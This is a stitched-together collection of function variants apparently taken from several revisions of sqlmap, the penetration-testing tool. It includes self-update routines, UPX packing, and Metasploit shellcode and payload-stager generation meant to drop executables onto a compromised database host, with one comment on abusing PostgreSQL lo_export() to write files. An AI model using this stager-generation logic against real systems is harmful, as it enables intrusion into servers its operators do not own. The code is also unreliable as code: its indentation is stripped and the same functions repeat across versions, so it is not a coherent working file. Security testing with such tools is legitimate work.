def update():
if not conf.updateAll:
return
rootDir = paths.SQLMAP_ROOT_PATH
infoMsg = "updating sqlmap to the latest development version from the "
infoMsg += "GitHub repository"
logger.info(infoMsg)
debugMsg = "sqlmap will try to update itself using 'git' command"
logger.debug(debugMsg)
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
process = execute("git pull %s" % rootDir, shell=True, stdout=PIPE, stderr=PIPE)
pollProcess(process, True)
stdout, stderr = process.communicate()
if not process.returncode:
logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", REVISION))
else:
logger.error("update could not be completed (%s)" % repr(stderr))
if IS_WIN:
infoMsg = "for Windows platform it's recommended "
infoMsg += "to use a GitHub for Windows client for updating "
infoMsg += "purposes (http://windows.github.com/)"
else:
infoMsg = "for Linux platform it's recommended "
infoMsg += "to use a standard 'git' package (e.g.: 'sudo apt-get install git')"
logger.info(infoMsg)
def pack(self, srcFile, dstFile=None):
self.__initialize(srcFile, dstFile)
logger.debug("executing local command: %s" % self.__upxCmd)
process = execute(self.__upxCmd,
shell=True,
stdout=PIPE,
stderr=STDOUT)
dataToStdout("\r[%s] [INFO] compression in progress " %
time.strftime("%X"))
pollProcess(process)
upxStdout, upxStderr = process.communicate()
if hasattr(self, '__upxTempExe'):
os.remove(self.__upxTempExe.name)
msg = "failed to compress the file"
if "NotCompressibleException" in upxStdout:
msg += " because you provided a Metasploit version above "
msg += "3.3-dev revision 6681. This will not inficiate "
msg += "the correct execution of sqlmap. It might "
msg += "only slow down a bit the execution"
logger.debug(msg)
elif upxStderr:
logger.warn(msg)
else:
return os.path.getsize(srcFile)
return None
def pack(self, srcFile, dstFile=None):
self.__initialize(srcFile, dstFile)
logger.debug("executing local command: %s" % self.__upxCmd)
process = execute(self.__upxCmd, shell=True, stdout=PIPE, stderr=STDOUT)
dataToStdout("\r[%s] [INFO] compression in progress " % time.strftime("%X"))
pollProcess(process)
upxStdout, upxStderr = process.communicate()
if hasattr(self, '__upxTempExe'):
os.remove(self.__upxTempExe.name)
msg = "failed to compress the file"
if "NotCompressibleException" in upxStdout:
msg += " because you provided a Metasploit version above "
msg += "3.3-dev revision 6681. This will not inficiate "
msg += "the correct execution of sqlmap. It might "
msg += "only slow down a bit the execution"
logger.debug(msg)
elif upxStderr:
logger.warn(msg)
else:
return os.path.getsize(srcFile)
return None
def __updateSqlmap():
rootDir = paths.SQLMAP_ROOT_PATH
infoMsg = "updating sqlmap to latest development version from the "
infoMsg += "subversion repository"
logger.info(infoMsg)
try:
import pysvn
debugMsg = "sqlmap will update itself using installed python-svn "
debugMsg += "third-party library, http://pysvn.tigris.org/"
logger.debug(debugMsg)
def notify(event_dict):
action = getUnicode(event_dict['action'])
index = action.find('_')
prefix = action[index + 1].upper() if index != -1 else action.capitalize()
if action.find('_update') != -1:
return
if action.find('_completed') == -1:
dataToStdout("%s\t%s\n" % (prefix, event_dict['path']))
else:
revision = getUnicode(event_dict['revision'])
index = revision.find('number ')
if index != -1:
revision = revision[index+7:].strip('>')
logger.info('updated to the latest revision %s' % revision)
client = pysvn.Client()
client.callback_notify = notify
client.update(rootDir)
except ImportError, _:
debugMsg = "sqlmap will try to update itself using 'svn' command"
logger.debug(debugMsg)
process = execute("svn update %s" % rootDir, shell=True, stdout=PIPE, stderr=PIPE)
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
pollProcess(process)
svnStdout, svnStderr = process.communicate()
if svnStderr:
errMsg = svnStderr.strip()
logger.error(errMsg)
elif svnStdout:
revision = re.search("revision\s+([\d]+)", svnStdout, re.I)
if revision:
logger.info('updated to the latest revision %s' % revision.group(1))
def update():
if not conf.updateAll:
return
success = False
rootDir = paths.SQLMAP_ROOT_PATH
if not os.path.exists(os.path.join(rootDir, ".git")):
errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
errMsg += "from GitHub (e.g. git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev)"
logger.error(errMsg)
else:
infoMsg = "updating sqlmap to the latest development version from the "
infoMsg += "GitHub repository"
logger.info(infoMsg)
debugMsg = "sqlmap will try to update itself using 'git' command"
logger.debug(debugMsg)
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
process = execute("git pull %s HEAD" % GIT_REPOSITORY,
shell=True,
stdout=PIPE,
stderr=PIPE)
pollProcess(process, True)
stdout, stderr = process.communicate()
success = not process.returncode
if success:
import lib.core.settings
_ = lib.core.settings.REVISION = getRevisionNumber()
logger.info(
"%s the latest revision '%s'" %
("already at" if "Already" in stdout else "updated to", _))
else:
logger.error("update could not be completed ('%s')" %
re.sub(r"\W+", " ", stderr).strip())
if not success:
if IS_WIN:
infoMsg = "for Windows platform it's recommended "
infoMsg += "to use a GitHub for Windows client for updating "
infoMsg += "purposes (http://windows.github.com/) or just "
infoMsg += "download the latest snapshot from "
infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads"
else:
infoMsg = "for Linux platform it's required "
infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')"
logger.info(infoMsg)
def createMsfShellcode(self, exitfunc, format, extra, encode):
infoMsg = "creating Metasploit Framework multi-stage shellcode "
logger.info(infoMsg)
self._randStr = randomStr(lowercase=True)
self._shellcodeFilePath = os.path.join(conf.outputPath,
"tmpm%s" % self._randStr)
self._initVars()
self._prepareIngredients(encode=encode)
self._forgeMsfPayloadCmd(exitfunc, format, self._shellcodeFilePath,
extra)
logger.debug("executing local command: %s" % self._payloadCmd)
process = execute(self._payloadCmd,
shell=True,
stdout=None,
stderr=PIPE)
dataToStdout("\r[%s] [INFO] creation in progress " %
time.strftime("%X"))
pollProcess(process)
payloadStderr = process.communicate()[1]
if Backend.isOs(OS.WINDOWS) or extra == "BufferRegister=EAX":
payloadSize = re.search("size ([\d]+)", payloadStderr, re.I)
else:
payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)
if payloadSize:
payloadSize = int(payloadSize.group(1))
if extra == "BufferRegister=EAX":
payloadSize = payloadSize / 2
debugMsg = "the shellcode size is %d bytes" % payloadSize
logger.debug(debugMsg)
else:
errMsg = "failed to create the shellcode (%s)" % payloadStderr.replace(
"\n", " ").replace("\r", "")
raise SqlmapFilePathException, errMsg
self._shellcodeFP = codecs.open(self._shellcodeFilePath, "rb")
self.shellcodeString = self._shellcodeFP.read()
self._shellcodeFP.close()
os.unlink(self._shellcodeFilePath)
def update():
if not conf.updateAll:
return
success = False
rootDir = paths.SQLMAP_ROOT_PATH
if not os.path.exists(os.path.join(rootDir, ".git")):
errMsg = "not a git repository. Please checkout the 'sqlmapproject/sqlmap' repository "
errMsg += "from GitHub (e.g. git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev)"
logger.error(errMsg)
else:
infoMsg = "updating sqlmap to the latest development version from the "
infoMsg += "GitHub repository"
logger.info(infoMsg)
debugMsg = "sqlmap will try to update itself using 'git' command"
logger.debug(debugMsg)
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
process = execute("git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE)
pollProcess(process, True)
stdout, stderr = process.communicate()
success = not process.returncode
if success:
logger.info(
"%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", REVISION)
)
else:
logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip())
if not success:
if IS_WIN:
infoMsg = "for Windows platform it's recommended "
infoMsg += "to use a GitHub for Windows client for updating "
infoMsg += "purposes (http://windows.github.com/) or just "
infoMsg += "download the latest snapshot from "
infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads"
else:
infoMsg = "for Linux platform it's required "
infoMsg += "to install a standard 'git' package (e.g.: 'sudo apt-get install git')"
logger.info(infoMsg)
def createMsfShellcode(self, exitfunc, format, extra, encode):
infoMsg = "creating Metasploit Framework multi-stage shellcode "
logger.info(infoMsg)
self.__randStr = randomStr(lowercase=True)
self.__shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self.__randStr)
self.__initVars()
self.__prepareIngredients(encode=encode)
self.__forgeMsfPayloadCmd(exitfunc, format, self.__shellcodeFilePath, extra)
logger.debug("executing local command: %s" % self.__payloadCmd)
process = execute(self.__payloadCmd, shell=True, stdout=None, stderr=PIPE)
dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
pollProcess(process)
payloadStderr = process.communicate()[1]
if Backend.isOs(OS.WINDOWS) or extra == "BufferRegister=EAX":
payloadSize = re.search("size ([\d]+)", payloadStderr, re.I)
else:
payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)
if payloadSize:
payloadSize = int(payloadSize.group(1))
if extra == "BufferRegister=EAX":
payloadSize = payloadSize / 2
debugMsg = "the shellcode size is %d bytes" % payloadSize
logger.debug(debugMsg)
else:
errMsg = "failed to create the shellcode (%s)" % payloadStderr.replace("\n", " ").replace("\r", "")
raise sqlmapFilePathException, errMsg
self.__shellcodeFP = codecs.open(self.__shellcodeFilePath, "rb")
self.shellcodeString = self.__shellcodeFP.read()
self.__shellcodeFP.close()
os.unlink(self.__shellcodeFilePath)
def createMsfShellcode(self, exitfunc, format, extra, encode):
infoMsg = "creating Metasploit Framework multi-stage shellcode "
logger.info(infoMsg)
self._randStr = randomStr(lowercase=True)
self._shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self._randStr)
Metasploit._initVars(self)
self._prepareIngredients(encode=encode)
self._forgeMsfPayloadCmd(exitfunc, format, self._shellcodeFilePath, extra)
logger.debug("executing local command: %s" % self._payloadCmd)
process = execute(self._payloadCmd, shell=True, stdout=None, stderr=PIPE)
dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
pollProcess(process)
payloadStderr = process.communicate()[1]
match = re.search("(Total size:|Length:|succeeded with size) ([\d]+)", payloadStderr)
if match:
payloadSize = int(match.group(2))
if extra == "BufferRegister=EAX":
payloadSize = payloadSize / 2
debugMsg = "the shellcode size is %d bytes" % payloadSize
logger.debug(debugMsg)
else:
errMsg = "failed to create the shellcode (%s)" % payloadStderr.replace("\n", " ").replace("\r", "")
raise SqlmapFilePathException(errMsg)
self._shellcodeFP = open(self._shellcodeFilePath, "rb")
self.shellcodeString = self._shellcodeFP.read()
self._shellcodeFP.close()
os.unlink(self._shellcodeFilePath)
def update():
if not conf.updateAll:
return
errMsg = "sqlmap is now hosted on GitHub at https://github.com/sqlmapproject/sqlmap. "
errMsg += "The --update switch is currently outdated and not working. Please, "
errMsg += "update sqlmap running 'git pull' for the time being"
raise sqlmapUnsupportedFeatureException, errMsg
rootDir = paths.SQLMAP_ROOT_PATH
infoMsg = "updating sqlmap to latest development version from the "
infoMsg += "subversion repository"
logger.info(infoMsg)
try:
import pysvn
debugMsg = "sqlmap will update itself using installed python-svn "
debugMsg += "third-party library, http://pysvn.tigris.org/"
logger.debug(debugMsg)
def notify(event_dict):
action = getUnicode(event_dict["action"])
index = action.find("_")
prefix = action[index + 1].upper() if index != -1 else action.capitalize()
if action.find("_update") != -1:
return
if action.find("_completed") == -1:
dataToStdout("%s\t%s\n" % (prefix, event_dict["path"]))
else:
revision = getUnicode(event_dict["revision"], UNICODE_ENCODING)
index = revision.find("number ")
if index != -1:
revision = revision[index + 7 :].strip(">")
logger.info("updated to the latest revision %s" % revision)
client = pysvn.Client()
client.callback_notify = notify
try:
client.update(rootDir)
except pysvn.ClientError, e:
errMsg = "unable to update sqlmap from subversion: '%s'. " % str(e)
errMsg += "You are strongly advised to checkout "
errMsg += "the clean copy from repository manually "
if IS_WIN:
errMsg += "(e.g. Right click -> TortoiseSVN -> Checkout... and type "
errMsg += '"https://svn.sqlmap.org/sqlmap/trunk/sqlmap" into field "URL of repository")'
else:
errMsg += '(e.g. "svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev")'
logger.error(errMsg)
except ImportError, _:
debugMsg = "sqlmap will try to update itself using 'svn' command"
logger.debug(debugMsg)
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
process = execute("svn update %s" % rootDir, shell=True, stdout=PIPE)
pollProcess(process)
svnStdout, _ = process.communicate()
if svnStdout:
revision = re.search("revision\s+([\d]+)", svnStdout, re.I)
if revision:
logger.info("updated to the latest revision %s" % revision.group(1))
if IS_WIN:
infoMsg = "for Windows platform it's recommended "
infoMsg += "to use a TortoiseSVN GUI client for updating "
infoMsg += "purposes (http://tortoisesvn.net/downloads.html)"
logger.info(infoMsg)
def update():
if not conf.updateAll:
return
rootDir = paths.SQLMAP_ROOT_PATH
infoMsg = "updating sqlmap to latest development version from the "
infoMsg += "subversion repository"
logger.info(infoMsg)
try:
import pysvn
debugMsg = "sqlmap will update itself using installed python-svn "
debugMsg += "third-party library, http://pysvn.tigris.org/"
logger.debug(debugMsg)
def notify(event_dict):
action = getUnicode(event_dict['action'])
index = action.find('_')
prefix = action[index +
1].upper() if index != -1 else action.capitalize()
if action.find('_update') != -1:
return
if action.find('_completed') == -1:
dataToStdout("%s\t%s\n" % (prefix, event_dict['path']))
else:
revision = getUnicode(event_dict['revision'], UNICODE_ENCODING)
index = revision.find('number ')
if index != -1:
revision = revision[index + 7:].strip('>')
logger.info('updated to the latest revision %s' % revision)
client = pysvn.Client()
client.callback_notify = notify
client.update(rootDir)
except ImportError, _:
debugMsg = "sqlmap will try to update itself using 'svn' command"
logger.debug(debugMsg)
process = execute("svn update %s" % rootDir,
shell=True,
stdout=PIPE,
stderr=PIPE)
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
pollProcess(process)
svnStdout, svnStderr = process.communicate()
if svnStderr:
errMsg = getUnicode(svnStderr, system=True).strip()
logger.error(errMsg)
if IS_WIN:
infoMsg = "for Windows platform it's recommended "
infoMsg += "to use a TortoiseSVN GUI client for updating "
infoMsg += "purposes (http://tortoisesvn.net/)"
logger.info(infoMsg)
elif svnStdout:
revision = re.search("revision\s+([\d]+)", svnStdout, re.I)
if revision:
logger.info('updated to the latest revision %s' %
revision.group(1))
def createMsfPayloadStager(self, initialize=True):
if initialize:
infoMsg = ""
else:
infoMsg = "re"
infoMsg += "creating Metasploit Framework 3 payload stager"
logger.info(infoMsg)
self.__randStr = randomStr(lowercase=True)
if kb.os == "Windows":
self.exeFilePathLocal = os.path.join(conf.outputPath, "tmpm%s.exe" % self.__randStr)
# Metasploit developers added support for the old exe format
# to msfencode using '-t exe-small' (>= 3.3.3-dev),
# http://www.metasploit.com/redmine/projects/framework/repository/revisions/7840
# This is useful for sqlmap because on PostgreSQL it is not
# possible to write files bigger than 8192 bytes abusing the
# lo_export() feature implemented in sqlmap.
if Backend.getIdentifiedDbms() == DBMS.PGSQL:
self.__fileFormat = "exe-small"
else:
self.__fileFormat = "exe"
else:
self.exeFilePathLocal = os.path.join(conf.outputPath, "tmpm%s" % self.__randStr)
self.__fileFormat = "elf"
if initialize:
self.__initVars()
if self.payloadStr is None:
self.__prepareIngredients()
self.__forgeMsfPayloadCmd("process", self.__fileFormat, self.exeFilePathLocal)
logger.debug("executing local command: %s" % self.__payloadCmd)
process = execute(self.__payloadCmd, shell=True, stdout=None, stderr=PIPE)
dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
pollProcess(process)
payloadStderr = process.communicate()[1]
if kb.os == "Windows":
payloadSize = re.search("size\s([\d]+)", payloadStderr, re.I)
else:
payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)
os.chmod(self.exeFilePathLocal, stat.S_IRWXU)
if payloadSize:
payloadSize = payloadSize.group(1)
exeSize = os.path.getsize(self.exeFilePathLocal)
# Only pack the payload stager if the back-end DBMS operating
# system is Windows and new portable executable template is
# used
if self.__fileFormat == "exe":
packedSize = upx.pack(self.exeFilePathLocal)
else:
packedSize = None
debugMsg = "the encoded payload size is %s bytes, " % payloadSize
if packedSize and packedSize < exeSize:
debugMsg += "as a compressed portable executable its size "
debugMsg += "is %d bytes, decompressed it " % packedSize
debugMsg += "was %s bytes large" % exeSize
else:
debugMsg += "as a portable executable its size is "
debugMsg += "%s bytes" % exeSize
logger.debug(debugMsg)
else:
errMsg = "failed to create the payload stager (%s)" % payloadStderr
raise sqlmapFilePathException, errMsg
def update():
if not conf.updateAll:
return
rootDir = paths.SQLMAP_ROOT_PATH
infoMsg = "updating sqlmap to latest development version from the "
infoMsg += "subversion repository"
logger.info(infoMsg)
try:
import pysvn
debugMsg = "sqlmap will update itself using installed python-svn "
debugMsg += "third-party library, http://pysvn.tigris.org/"
logger.debug(debugMsg)
def notify(event_dict):
action = getUnicode(event_dict['action'])
index = action.find('_')
prefix = action[index + 1].upper() if index != -1 else action.capitalize()
if action.find('_update') != -1:
return
if action.find('_completed') == -1:
dataToStdout("%s\t%s\n" % (prefix, event_dict['path']))
else:
revision = getUnicode(event_dict['revision'], UNICODE_ENCODING)
index = revision.find('number ')
if index != -1:
revision = revision[index+7:].strip('>')
logger.info('updated to the latest revision %s' % revision)
client = pysvn.Client()
client.callback_notify = notify
try:
client.update(rootDir)
except pysvn.ClientError, e:
errMsg = "unable to update sqlmap from subversion: '%s'. " % str(e)
errMsg += "You are strongly advised to checkout "
errMsg += "the clean copy from repository manually "
if IS_WIN:
errMsg += "(e.g. Right click -> TortoiseSVN -> Checkout... and type "
errMsg += "\"https://svn.sqlmap.org/sqlmap/trunk/sqlmap\" into field \"URL of repository\")"
else:
errMsg += "(e.g. \"svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev\")"
logger.error(errMsg)
except ImportError, _:
debugMsg = "sqlmap will try to update itself using 'svn' command"
logger.debug(debugMsg)
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
process = execute("svn update %s" % rootDir, shell=True, stdout=PIPE)
pollProcess(process)
svnStdout, _ = process.communicate()
if svnStdout:
revision = re.search("revision\s+([\d]+)", svnStdout, re.I)
if revision:
logger.info('updated to the latest revision %s' % revision.group(1))
if IS_WIN:
infoMsg = "for Windows platform it's recommended "
infoMsg += "to use a TortoiseSVN GUI client for updating "
infoMsg += "purposes (http://tortoisesvn.net/downloads.html)"
logger.info(infoMsg)
def update():
if not conf.updateAll:
return
errMsg = "sqlmap is now hosted on GitHub at https://github.com/sqlmapproject/sqlmap. "
errMsg += "The --update switch is currently outdated and not working. Please, "
errMsg += "update sqlmap running 'git pull' for the time being"
raise sqlmapUnsupportedFeatureException, errMsg
rootDir = paths.SQLMAP_ROOT_PATH
infoMsg = "updating sqlmap to latest development version from the "
infoMsg += "subversion repository"
logger.info(infoMsg)
try:
import pysvn
debugMsg = "sqlmap will update itself using installed python-svn "
debugMsg += "third-party library, http://pysvn.tigris.org/"
logger.debug(debugMsg)
def notify(event_dict):
action = getUnicode(event_dict['action'])
index = action.find('_')
prefix = action[index + 1].upper() if index != -1 else action.capitalize()
if action.find('_update') != -1:
return
if action.find('_completed') == -1:
dataToStdout("%s\t%s\n" % (prefix, event_dict['path']))
else:
revision = getUnicode(event_dict['revision'], UNICODE_ENCODING)
index = revision.find('number ')
if index != -1:
revision = revision[index+7:].strip('>')
logger.info('updated to the latest revision %s' % revision)
client = pysvn.Client()
client.callback_notify = notify
try:
client.update(rootDir)
except pysvn.ClientError, e:
errMsg = "unable to update sqlmap from subversion: '%s'. " % str(e)
errMsg += "You are strongly advised to checkout "
errMsg += "the clean copy from repository manually "
if IS_WIN:
errMsg += "(e.g. Right click -> TortoiseSVN -> Checkout... and type "
errMsg += "\"https://svn.sqlmap.org/sqlmap/trunk/sqlmap\" into field \"URL of repository\")"
else:
errMsg += "(e.g. \"svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev\")"
logger.error(errMsg)
except ImportError, _:
debugMsg = "sqlmap will try to update itself using 'svn' command"
logger.debug(debugMsg)
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
process = execute("svn update %s" % rootDir, shell=True, stdout=PIPE)
pollProcess(process)
svnStdout, _ = process.communicate()
if svnStdout:
revision = re.search("revision\s+([\d]+)", svnStdout, re.I)
if revision:
logger.info('updated to the latest revision %s' % revision.group(1))
if IS_WIN:
infoMsg = "for Windows platform it's recommended "
infoMsg += "to use a TortoiseSVN GUI client for updating "
infoMsg += "purposes (http://tortoisesvn.net/downloads.html)"
logger.info(infoMsg)
def createMsfPayloadStager(self, initialize=True):
if initialize:
infoMsg = ""
else:
infoMsg = "re"
infoMsg += "creating Metasploit Framework 3 payload stager"
logger.info(infoMsg)
self.__randStr = randomStr(lowercase=True)
if kb.os == "Windows":
self.exeFilePathLocal = os.path.join(conf.outputPath,
"tmpm%s.exe" % self.__randStr)
# Metasploit developers added support for the old exe format
# to msfencode using '-t exe-small' (>= 3.3.3-dev),
# http://www.metasploit.com/redmine/projects/framework/repository/revisions/7840
# This is useful for sqlmap because on PostgreSQL it is not
# possible to write files bigger than 8192 bytes abusing the
# lo_export() feature implemented in sqlmap.
if Backend.getIdentifiedDbms() == DBMS.PGSQL:
self.__fileFormat = "exe-small"
else:
self.__fileFormat = "exe"
else:
self.exeFilePathLocal = os.path.join(conf.outputPath,
"tmpm%s" % self.__randStr)
self.__fileFormat = "elf"
if initialize:
self.__initVars()
if self.payloadStr is None:
self.__prepareIngredients()
self.__forgeMsfPayloadCmd("process", self.__fileFormat,
self.exeFilePathLocal)
logger.debug("executing local command: %s" % self.__payloadCmd)
process = execute(self.__payloadCmd,
shell=True,
stdout=None,
stderr=PIPE)
dataToStdout("\r[%s] [INFO] creation in progress " %
time.strftime("%X"))
pollProcess(process)
payloadStderr = process.communicate()[1]
if kb.os == "Windows":
payloadSize = re.search("size\s([\d]+)", payloadStderr, re.I)
else:
payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)
os.chmod(self.exeFilePathLocal, stat.S_IRWXU)
if payloadSize:
payloadSize = payloadSize.group(1)
exeSize = os.path.getsize(self.exeFilePathLocal)
# Only pack the payload stager if the back-end DBMS operating
# system is Windows and new portable executable template is
# used
if self.__fileFormat == "exe":
packedSize = upx.pack(self.exeFilePathLocal)
else:
packedSize = None
debugMsg = "the encoded payload size is %s bytes, " % payloadSize
if packedSize and packedSize < exeSize:
debugMsg += "as a compressed portable executable its size "
debugMsg += "is %d bytes, decompressed it " % packedSize
debugMsg += "was %s bytes large" % exeSize
else:
debugMsg += "as a portable executable its size is "
debugMsg += "%s bytes" % exeSize
logger.debug(debugMsg)
else:
errMsg = "failed to create the payload stager (%s)" % payloadStderr
raise sqlmapFilePathException, errMsg
def update():
if not conf.updateAll:
return
rootDir = paths.SQLMAP_ROOT_PATH
infoMsg = "updating sqlmap to latest development version from the "
infoMsg += "subversion repository"
logger.info(infoMsg)
try:
import pysvn
debugMsg = "sqlmap will update itself using installed python-svn "
debugMsg += "third-party library, http://pysvn.tigris.org/"
logger.debug(debugMsg)
def notify(event_dict):
action = getUnicode(event_dict["action"])
index = action.find("_")
prefix = action[index + 1].upper() if index != -1 else action.capitalize()
if action.find("_update") != -1:
return
if action.find("_completed") == -1:
dataToStdout("%s\t%s\n" % (prefix, event_dict["path"]))
else:
revision = getUnicode(event_dict["revision"], UNICODE_ENCODING)
index = revision.find("number ")
if index != -1:
revision = revision[index + 7 :].strip(">")
logger.info("updated to the latest revision %s" % revision)
client = pysvn.Client()
client.callback_notify = notify
try:
client.update(rootDir)
except pysvn.ClientError, e:
errMsg = "unable to update sqlmap from subversion: '%s'" % str(e)
logger.error(errMsg)
except ImportError, _:
debugMsg = "sqlmap will try to update itself using 'svn' command"
logger.debug(debugMsg)
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
process = execute("svn update %s" % rootDir, shell=True, stdout=PIPE)
pollProcess(process)
svnStdout, _ = process.communicate()
if svnStdout:
revision = re.search("revision\s+([\d]+)", svnStdout, re.I)
if revision:
logger.info("updated to the latest revision %s" % revision.group(1))
if IS_WIN:
infoMsg = "for Windows platform it's recommended "
infoMsg += "to use a TortoiseSVN GUI client for updating "
infoMsg += "purposes (http://tortoisesvn.net/downloads.html)"
logger.info(infoMsg)
